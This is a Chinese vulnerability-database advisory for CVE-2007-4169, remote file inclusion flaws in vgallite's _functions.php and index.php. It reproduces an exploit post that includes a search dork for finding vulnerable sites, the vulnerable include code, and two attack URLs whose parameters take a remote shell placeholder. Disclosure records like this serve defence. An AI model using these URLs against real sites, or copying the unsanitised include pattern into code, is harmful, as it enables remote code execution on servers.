vgallite 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189564 漏洞类型 代码注入
发布时间 2007-08-07 更新时间 2007-08-07
CVE编号 CVE-2007-4169 CNNVD-ID CNNVD-200708-067
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2007080030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-067
|漏洞详情
**有争议的**vgallite中存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1)对_functions.php的dirpath参数或(2)对index.php的lang参数中的一个URL,执行任意PHP代码。
|漏洞EXP
Discovred By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Jonathan , Muts  
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File: 
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".((isset($language))?$language:"english").".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
|参考资料

来源:XF
名称:vgallite-index-file-include(35819)
链接:http://xforce.iss.net/xforce/xfdb/35819
来源:BUGTRAQ
名称:20070804ALLvgalliteRemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/475643/100/0/threaded
来源:SREASON
名称:2963
链接:http://securityreason.com/securityalert/2963
来源:OSVDB
名称:46803
链接:http://osvdb.org/46803